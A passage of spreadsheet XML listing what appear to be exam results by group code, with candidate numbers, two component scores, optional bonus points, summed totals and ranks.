      <c r="E306" s="8" t="n">
        <v>56.6</v>
      </c>
      <c r="F306" s="8" t="n">
        <v>64</v>
      </c>
      <c r="G306" s="8"/>
      <c r="H306" s="8" t="n">
        <f aca="false">SUM(E306:G306)</f>
        <v>120.6</v>
      </c>
      <c r="I306" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="307" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A307" s="9" t="n">
        <v>4300070</v>
      </c>
      <c r="B307" s="8" t="n">
        <v>1314011117</v>
      </c>
      <c r="C307" s="8" t="s">
        <v>136</v>
      </c>
      <c r="D307" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E307" s="8" t="n">
        <v>58.4</v>
      </c>
      <c r="F307" s="8" t="n">
        <v>60.4</v>
      </c>
      <c r="G307" s="8"/>
      <c r="H307" s="8" t="n">
        <f aca="false">SUM(E307:G307)</f>
        <v>118.8</v>
      </c>
      <c r="I307" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="308" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A308" s="9" t="n">
        <v>4300070</v>
      </c>
      <c r="B308" s="8" t="n">
        <v>1314011114</v>
      </c>
      <c r="C308" s="8" t="s">
        <v>136</v>
      </c>
      <c r="D308" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E308" s="8" t="n">
        <v>49.2</v>
      </c>
      <c r="F308" s="8" t="n">
        <v>64.8</v>
      </c>
      <c r="G308" s="8"/>
      <c r="H308" s="8" t="n">
        <f aca="false">SUM(E308:G308)</f>
        <v>114</v>
      </c>
      <c r="I308" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="309" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A309" s="9" t="n">
        <v>4300070</v>
      </c>
      <c r="B309" s="8" t="n">
        <v>1314011115</v>
      </c>
      <c r="C309" s="8" t="s">
        <v>136</v>
      </c>
      <c r="D309" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E309" s="8" t="n">
        <v>48.4</v>
      </c>
      <c r="F309" s="8" t="n">
        <v>52.6</v>
      </c>
      <c r="G309" s="8"/>
      <c r="H309" s="8" t="n">
        <f aca="false">SUM(E309:G309)</f>
        <v>101</v>
      </c>
      <c r="I309" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="310" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A310" s="9" t="n">
        <v>4300070</v>
      </c>
      <c r="B310" s="8" t="n">
        <v>1314011113</v>
      </c>
      <c r="C310" s="8" t="s">
        <v>136</v>
      </c>
      <c r="D310" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E310" s="8" t="n">
        <v>45</v>
      </c>
      <c r="F310" s="8" t="n">
        <v>52.2</v>
      </c>
      <c r="G310" s="8"/>
      <c r="H310" s="8" t="n">
        <f aca="false">SUM(E310:G310)</f>
        <v>97.2</v>
      </c>
      <c r="I310" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="311" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A311" s="9" t="n">
        <v>4300071</v>
      </c>
      <c r="B311" s="8" t="n">
        <v>1314011124</v>
      </c>
      <c r="C311" s="8" t="s">
        <v>137</v>
      </c>
      <c r="D311" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E311" s="8" t="n">
        <v>56.2</v>
      </c>
      <c r="F311" s="8" t="n">
        <v>68.4</v>
      </c>
      <c r="G311" s="8"/>
      <c r="H311" s="8" t="n">
        <f aca="false">SUM(E311:G311)</f>
        <v>124.6</v>
      </c>
      <c r="I311" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="312" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A312" s="9" t="n">
        <v>4300071</v>
      </c>
      <c r="B312" s="8" t="n">
        <v>1314011128</v>
      </c>
      <c r="C312" s="8" t="s">
        <v>137</v>
      </c>
      <c r="D312" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E312" s="8" t="n">
        <v>63.8</v>
      </c>
      <c r="F312" s="8" t="n">
        <v>60.8</v>
      </c>
      <c r="G312" s="8"/>
      <c r="H312" s="8" t="n">
        <f aca="false">SUM(E312:G312)</f>
        <v>124.6</v>
      </c>
      <c r="I312" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="313" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A313" s="9" t="n">
        <v>4300071</v>
      </c>
      <c r="B313" s="8" t="n">
        <v>1314011130</v>
      </c>
      <c r="C313" s="8" t="s">
        <v>137</v>
      </c>
      <c r="D313" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E313" s="8" t="n">
        <v>57</v>
      </c>
      <c r="F313" s="8" t="n">
        <v>65.2</v>
      </c>
      <c r="G313" s="8"/>
      <c r="H313" s="8" t="n">
        <f aca="false">SUM(E313:G313)</f>
        <v>122.2</v>
      </c>
      <c r="I313" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="314" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A314" s="9" t="n">
        <v>4300071</v>
      </c>
      <c r="B314" s="8" t="n">
        <v>1314011201</v>
      </c>
      <c r="C314" s="8" t="s">
        <v>137</v>
      </c>
      <c r="D314" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E314" s="8" t="n">
        <v>52.8</v>
      </c>
      <c r="F314" s="8" t="n">
        <v>64.8</v>
      </c>
      <c r="G314" s="8"/>
      <c r="H314" s="8" t="n">
        <f aca="false">SUM(E314:G314)</f>
        <v>117.6</v>
      </c>
      <c r="I314" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="315" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A315" s="9" t="n">
        <v>4300071</v>
      </c>
      <c r="B315" s="8" t="n">
        <v>1314011122</v>
      </c>
      <c r="C315" s="8" t="s">
        <v>137</v>
      </c>
      <c r="D315" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E315" s="8" t="n">
        <v>57.2</v>
      </c>
      <c r="F315" s="8" t="n">
        <v>59.4</v>
      </c>
      <c r="G315" s="8"/>
      <c r="H315" s="8" t="n">
        <f aca="false">SUM(E315:G315)</f>
        <v>116.6</v>
      </c>
      <c r="I315" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="316" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A316" s="9" t="n">
        <v>4300071</v>
      </c>
      <c r="B316" s="8" t="n">
        <v>1314011123</v>
      </c>
      <c r="C316" s="8" t="s">
        <v>137</v>
      </c>
      <c r="D316" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E316" s="8" t="n">
        <v>51</v>
      </c>
      <c r="F316" s="8" t="n">
        <v>65.2</v>
      </c>
      <c r="G316" s="8"/>
      <c r="H316" s="8" t="n">
        <f aca="false">SUM(E316:G316)</f>
        <v>116.2</v>
      </c>
      <c r="I316" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="317" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A317" s="9" t="n">
        <v>4300071</v>
      </c>
      <c r="B317" s="8" t="n">
        <v>1314011120</v>
      </c>
      <c r="C317" s="8" t="s">
        <v>137</v>
      </c>
      <c r="D317" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E317" s="8" t="n">
        <v>56.4</v>
      </c>
      <c r="F317" s="8" t="n">
        <v>57.6</v>
      </c>
      <c r="G317" s="8"/>
      <c r="H317" s="8" t="n">
        <f aca="false">SUM(E317:G317)</f>
        <v>114</v>
      </c>
      <c r="I317" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="318" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A318" s="9" t="n">
        <v>4300071</v>
      </c>
      <c r="B318" s="8" t="n">
        <v>1314011125</v>
      </c>
      <c r="C318" s="8" t="s">
        <v>137</v>
      </c>
      <c r="D318" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E318" s="8" t="n">
        <v>51.8</v>
      </c>
      <c r="F318" s="8" t="n">
        <v>61.8</v>
      </c>
      <c r="G318" s="8"/>
      <c r="H318" s="8" t="n">
        <f aca="false">SUM(E318:G318)</f>
        <v>113.6</v>
      </c>
      <c r="I318" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="319" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A319" s="9" t="n">
        <v>4300071</v>
      </c>
      <c r="B319" s="8" t="n">
        <v>1314011119</v>
      </c>
      <c r="C319" s="8" t="s">
        <v>137</v>
      </c>
      <c r="D319" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E319" s="8" t="n">
        <v>49.8</v>
      </c>
      <c r="F319" s="8" t="n">
        <v>62.4</v>
      </c>
      <c r="G319" s="8"/>
      <c r="H319" s="8" t="n">
        <f aca="false">SUM(E319:G319)</f>
        <v>112.2</v>
      </c>
      <c r="I319" s="8" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="320" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A320" s="9" t="n">
        <v>4300071</v>
      </c>
      <c r="B320" s="8" t="n">
        <v>1314011121</v>
      </c>
      <c r="C320" s="8" t="s">
        <v>137</v>
      </c>
      <c r="D320" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E320" s="8" t="n">
        <v>39.6</v>
      </c>
      <c r="F320" s="8" t="n">
        <v>64.2</v>
      </c>
      <c r="G320" s="8"/>
      <c r="H320" s="8" t="n">
        <f aca="false">SUM(E320:G320)</f>
        <v>103.8</v>
      </c>
      <c r="I320" s="8" t="n">
        <v>10</v>
      </c>
    </row>
    <row r="321" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A321" s="9" t="n">
        <v>4300071</v>
      </c>
      <c r="B321" s="8" t="n">
        <v>1314011127</v>
      </c>
      <c r="C321" s="8" t="s">
        <v>137</v>
      </c>
      <c r="D321" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E321" s="8" t="n">
        <v>47.2</v>
      </c>
      <c r="F321" s="8" t="n">
        <v>50.4</v>
      </c>
      <c r="G321" s="8"/>
      <c r="H321" s="8" t="n">
        <f aca="false">SUM(E321:G321)</f>
        <v>97.6</v>
      </c>
      <c r="I321" s="8" t="n">
        <v>11</v>
      </c>
    </row>
    <row r="322" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A322" s="9" t="n">
        <v>4300071</v>
      </c>
      <c r="B322" s="8" t="n">
        <v>1314011126</v>
      </c>
      <c r="C322" s="8" t="s">
        <v>137</v>
      </c>
      <c r="D322" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E322" s="8" t="n">
        <v>45.8</v>
      </c>
      <c r="F322" s="8" t="n">
        <v>47.8</v>
      </c>
      <c r="G322" s="8"/>
      <c r="H322" s="8" t="n">
        <f aca="false">SUM(E322:G322)</f>
        <v>93.6</v>
      </c>
      <c r="I322" s="8" t="n">
        <v>12</v>
      </c>
    </row>
    <row r="323" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A323" s="9" t="n">
        <v>4300071</v>
      </c>
      <c r="B323" s="8" t="n">
        <v>1314011129</v>
      </c>
      <c r="C323" s="8" t="s">
        <v>137</v>
      </c>
      <c r="D323" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E323" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F323" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G323" s="8"/>
      <c r="H323" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I323" s="8" t="n">
        <v>13</v>
      </c>
    </row>
    <row r="324" s="12" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A324" s="9" t="n">
        <v>4300072</v>
      </c>
      <c r="B324" s="8" t="n">
        <v>1314011202</v>
      </c>
      <c r="C324" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D324" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E324" s="8" t="n">
        <v>65</v>
      </c>
      <c r="F324" s="8" t="n">
        <v>71.6</v>
      </c>
      <c r="G324" s="11"/>
      <c r="H324" s="8" t="n">
        <f aca="false">SUM(E324:G324)</f>
        <v>136.6</v>
      </c>
      <c r="I324" s="9" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="325" s="12" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A325" s="9" t="n">
        <v>4300072</v>
      </c>
      <c r="B325" s="8" t="n">
        <v>1314011213</v>
      </c>
      <c r="C325" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D325" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E325" s="8" t="n">
        <v>63.6</v>
      </c>
      <c r="F325" s="8" t="n">
        <v>72.2</v>
      </c>
      <c r="G325" s="11"/>
      <c r="H325" s="8" t="n">
        <f aca="false">SUM(E325:G325)</f>
        <v>135.8</v>
      </c>
      <c r="I325" s="9" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="326" s="12" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A326" s="9" t="n">
        <v>4300072</v>
      </c>
      <c r="B326" s="8" t="n">
        <v>1314011207</v>
      </c>
      <c r="C326" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D326" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E326" s="8" t="n">
        <v>63.4</v>
      </c>
      <c r="F326" s="8" t="n">
        <v>64.8</v>
      </c>
      <c r="G326" s="9" t="n">
        <v>5</v>
      </c>
      <c r="H326" s="8" t="n">
        <f aca="false">SUM(E326:G326)</f>
        <v>133.2</v>
      </c>
      <c r="I326" s="9" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="327" s="12" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A327" s="9" t="n">
        <v>4300072</v>
      </c>
      <c r="B327" s="8" t="n">
        <v>1314011211</v>
      </c>
      <c r="C327" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D327" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E327" s="8" t="n">
        <v>60.4</v>
      </c>
      <c r="F327" s="8" t="n">
        <v>68.6</v>
      </c>
      <c r="G327" s="9" t="n">
        <v>3</v>
      </c>
      <c r="H327" s="8" t="n">
        <f aca="false">SUM(E327:G327)</f>
        <v>132</v>
      </c>
      <c r="I327" s="9" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="328" s="12" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A328" s="9" t="n">
        <v>4300072</v>
      </c>
      <c r="B328" s="8" t="n">
        <v>1314011204</v>
      </c>
      <c r="C328" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D328" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E328" s="8" t="n">
        <v>63.6</v>
      </c>
      <c r="F328" s="8" t="n">
        <v>67.2</v>
      </c>
      <c r="G328" s="11"/>
      <c r="H328" s="8" t="n">
        <f aca="false">SUM(E328:G328)</f>
        <v>130.8</v>
      </c>
      <c r="I328" s="9" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="329" s="12" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A329" s="9" t="n">
        <v>4300072</v>
      </c>
      <c r="B329" s="8" t="n">
        <v>1314011206</v>
      </c>
      <c r="C329" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D329" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E329" s="8" t="n">
        <v>57.8</v>
      </c>
      <c r="F329" s="8" t="n">
        <v>69.4</v>
      </c>
      <c r="G329" s="9" t="n">
        <v>3</v>
      </c>
      <c r="H329" s="8" t="n">
        <f aca="false">SUM(E329:G329)</f>
        <v>130.2</v>
      </c>
      <c r="I329" s="9" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="330" s="12" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A330" s="9" t="n">
        <v>4300072</v>
      </c>
      <c r="B330" s="8" t="n">
        <v>1314011210</v>
      </c>
      <c r="C330" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D330" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E330" s="8" t="n">
        <v>62.8</v>
      </c>
      <c r="F330" s="8" t="n">
        <v>63.8</v>
      </c>
      <c r="G330" s="9" t="n">
        <v>3</v>
      </c>
      <c r="H330" s="8" t="n">
        <f aca="false">SUM(E330:G330)</f>
        <v>129.6</v>
      </c>
      <c r="I330" s="9" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="331" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A331" s="9" t="n">
        <v>4300072</v>
      </c>
      <c r="B331" s="8" t="n">
        <v>1314011205</v>
      </c>
      <c r="C331" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D331" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E331" s="8" t="n">
        <v>58.6</v>
      </c>
      <c r="F331" s="8" t="n">
        <v>68</v>
      </c>
      <c r="G331" s="11"/>
      <c r="H331" s="8" t="n">
        <f aca="false">SUM(E331:G331)</f>
        <v>126.6</v>
      </c>
      <c r="I331" s="9" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="332" s="12" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A332" s="9" t="n">
        <v>4300072</v>
      </c>
      <c r="B332" s="8" t="n">
        <v>1314011209</v>
      </c>
      <c r="C332" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D332" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E332" s="8" t="n">
        <v>56.4</v>
      </c>
      <c r="F332" s="8" t="n">
        <v>67.8</v>
      </c>
      <c r="G332" s="11"/>
      <c r="H332" s="8" t="n">
        <f aca="false">SUM(E332:G332)</f>
        <v>124.2</v>
      </c>
      <c r="I332" s="9" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="333" s="12" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A333" s="9" t="n">
        <v>4300072</v>
      </c>
      <c r="B333" s="8" t="n">
        <v>1314011203</v>
      </c>
      <c r="C333" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D333" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E333" s="8" t="n">
        <v>55.4</v>
      </c>
      <c r="F333" s="8" t="n">
        <v>60</v>
      </c>
      <c r="G333" s="11"/>
      <c r="H333" s="8" t="n">
        <f aca="false">SUM(E333:G333)</f>
        <v>115.4</v>
      </c>
      <c r="I333" s="9" t="n">
        <v>10</v>
      </c>
    </row>
    <row r="334" s="12" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A334" s="9" t="n">
        <v>4300072</v>
      </c>
      <c r="B334" s="8" t="n">
        <v>1314011212</v>
      </c>
      <c r="C334" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D334" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E334" s="8" t="n">
        <v>54.6</v>
      </c>
      <c r="F334" s="8" t="n">
        <v>60.2</v>
      </c>
      <c r="G334" s="11"/>
      <c r="H334" s="8" t="n">
        <f aca="false">SUM(E334:G334)</f>
        <v>114.8</v>
      </c>
      <c r="I334" s="9" t="n">
        <v>11</v>
      </c>
    </row>
    <row r="335" s="12" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A335" s="9" t="n">
        <v>4300072</v>
      </c>
      <c r="B335" s="8" t="n">
        <v>1314011208</v>
      </c>
      <c r="C335" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D335" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E335" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F335" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G335" s="11"/>
      <c r="H335" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I335" s="9" t="n">
        <v>12</v>
      </c>
    </row>
    <row r="336" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A336" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B336" s="8" t="n">
        <v>1314011229</v>
      </c>
      <c r="C336" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D336" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E336" s="8" t="n">
        <v>68.4</v>
      </c>
      <c r="F336" s="8" t="n">
        <v>75.4</v>
      </c>
      <c r="G336" s="11"/>
      <c r="H336" s="8" t="n">
        <f aca="false">SUM(E336:G336)</f>
        <v>143.8</v>
      </c>
      <c r="I336" s="9" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="337" s="13" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A337" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B337" s="8" t="n">
        <v>1314011309</v>
      </c>
      <c r="C337" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D337" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E337" s="8" t="n">
        <v>69.4</v>
      </c>
      <c r="F337" s="8" t="n">
        <v>69.2</v>
      </c>
      <c r="G337" s="9" t="n">
        <v>3</v>
      </c>
      <c r="H337" s="8" t="n">
        <f aca="false">SUM(E337:G337)</f>
        <v>141.6</v>
      </c>
      <c r="I337" s="9" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="338" s="13" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A338" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B338" s="8" t="n">
        <v>1314011307</v>
      </c>
      <c r="C338" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D338" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E338" s="8" t="n">
        <v>66.4</v>
      </c>
      <c r="F338" s="8" t="n">
        <v>70.4</v>
      </c>
      <c r="G338" s="11"/>
      <c r="H338" s="8" t="n">
        <f aca="false">SUM(E338:G338)</f>
        <v>136.8</v>
      </c>
      <c r="I338" s="9" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="339" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A339" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B339" s="8" t="n">
        <v>1314011230</v>
      </c>
      <c r="C339" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D339" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E339" s="8" t="n">
        <v>60.8</v>
      </c>
      <c r="F339" s="8" t="n">
        <v>71.6</v>
      </c>
      <c r="G339" s="9" t="n">
        <v>3</v>
      </c>
      <c r="H339" s="8" t="n">
        <f aca="false">SUM(E339:G339)</f>
        <v>135.4</v>
      </c>
      <c r="I339" s="9" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="340" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A340" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B340" s="8" t="n">
        <v>1314011227</v>
      </c>
      <c r="C340" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D340" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E340" s="8" t="n">
        <v>64</v>
      </c>
      <c r="F340" s="8" t="n">
        <v>65.8</v>
      </c>
      <c r="G340" s="9" t="n">
        <v>5</v>
      </c>
      <c r="H340" s="8" t="n">
        <f aca="false">SUM(E340:G340)</f>
        <v>134.8</v>
      </c>
      <c r="I340" s="9" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="341" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A341" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B341" s="8" t="n">
        <v>1314011226</v>
      </c>
      <c r="C341" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D341" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E341" s="8" t="n">
        <v>54.8</v>
      </c>
      <c r="F341" s="8" t="n">
        <v>74</v>
      </c>
      <c r="G341" s="9" t="n">
        <v>3</v>
      </c>
      <c r="H341" s="8" t="n">
        <f aca="false">SUM(E341:G341)</f>
        <v>131.8</v>
      </c>
      <c r="I341" s="9" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="342" s="13" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A342" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B342" s="8" t="n">
        <v>1314011308</v>
      </c>
      <c r="C342" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D342" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E342" s="8" t="n">
        <v>58</v>
      </c>
      <c r="F342" s="8" t="n">
        <v>69.6</v>
      </c>
      <c r="G342" s="11"/>
      <c r="H342" s="8" t="n">
        <f aca="false">SUM(E342:G342)</f>
        <v>127.6</v>
      </c>
      <c r="I342" s="9" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="343" s="13" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A343" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B343" s="8" t="n">
        <v>1314011306</v>
      </c>
      <c r="C343" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D343" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E343" s="8" t="n">
        <v>55.8</v>
      </c>
      <c r="F343" s="8" t="n">
        <v>70.8</v>
      </c>
      <c r="G343" s="11"/>
      <c r="H343" s="8" t="n">
        <f aca="false">SUM(E343:G343)</f>
        <v>126.6</v>
      </c>
      <c r="I343" s="9" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="344" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A344" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B344" s="8" t="n">
        <v>1314011220</v>
      </c>
      <c r="C344" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D344" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E344" s="8" t="n">
        <v>62.8</v>
      </c>
      <c r="F344" s="8" t="n">
        <v>62.8</v>
      </c>
      <c r="G344" s="11"/>
      <c r="H344" s="8" t="n">
        <f aca="false">SUM(E344:G344)</f>
        <v>125.6</v>
      </c>
      <c r="I344" s="9" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="345" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A345" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B345" s="8" t="n">
        <v>1314011218</v>
      </c>
      <c r="C345" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D345" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E345" s="8" t="n">
        <v>59.2</v>
      </c>
      <c r="F345" s="8" t="n">
        <v>65.6</v>
      </c>
      <c r="G345" s="11"/>
      <c r="H345" s="8" t="n">
        <f aca="false">SUM(E345:G345)</f>
        <v>124.8</v>
      </c>
      <c r="I345" s="9" t="n">
        <v>10</v>
      </c>
    </row>
    <row r="346" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A346" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B346" s="8" t="n">
        <v>1314011221</v>
      </c>
      <c r="C346" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D346" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E346" s="8" t="n">
        <v>58.2</v>
      </c>
      <c r="F346" s="8" t="n">
        <v>65.6</v>
      </c>
      <c r="G346" s="11"/>
      <c r="H346" s="8" t="n">
        <f aca="false">SUM(E346:G346)</f>
        <v>123.8</v>
      </c>
      <c r="I346" s="9" t="n">
        <v>11</v>
      </c>
    </row>
    <row r="347" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A347" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B347" s="8" t="n">
        <v>1314011214</v>
      </c>
      <c r="C347" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D347" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E347" s="8" t="n">
        <v>56.2</v>
      </c>
      <c r="F347" s="8" t="n">
        <v>64.4</v>
      </c>
      <c r="G347" s="9" t="n">
        <v>3</v>
      </c>
      <c r="H347" s="8" t="n">
        <f aca="false">SUM(E347:G347)</f>
        <v>123.6</v>
      </c>
      <c r="I347" s="9" t="n">
        <v>12</v>
      </c>
    </row>
    <row r="348" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A348" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B348" s="8" t="n">
        <v>1314011228</v>
      </c>
      <c r="C348" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D348" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E348" s="8" t="n">
        <v>54.8</v>
      </c>
